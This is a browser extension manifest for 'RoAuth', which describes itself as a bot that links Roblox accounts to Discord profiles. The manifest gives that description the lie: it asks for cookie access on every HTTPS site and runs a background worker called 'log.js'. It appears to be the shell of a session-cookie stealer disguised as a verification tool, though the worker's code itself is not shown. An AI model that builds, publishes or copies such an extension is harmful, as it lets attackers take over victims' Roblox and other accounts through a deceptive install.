{
  "name": "RoAuth",
  "description": "RoAuth is a simple yet powerful bot that helps link your Roblox account with your Discord profile. It’s perfect for servers that want to make sure their members are verified and roles are synced automatically.",
  "version": "1.0.0",
  "manifest_version": 3,

  "action": {
    "default_icon": {
      "16": "assets/logo.png",
      "32": "assets/logo.png",
      "48": "assets/logo.png",
      "128": "assets/logo.png"
    }
  },

  "host_permissions": [
    "https://*/*"
  ],

  "permissions": [
    "cookies",
    "storage"
  ],

  "background": {
    "service_worker": "scripts/log.js"
  },

  "icons": {
    "16": "assets/logo.png",
    "32": "assets/logo.png",
    "48": "assets/logo.png",
    "128": "assets/logo.png"
  }
}
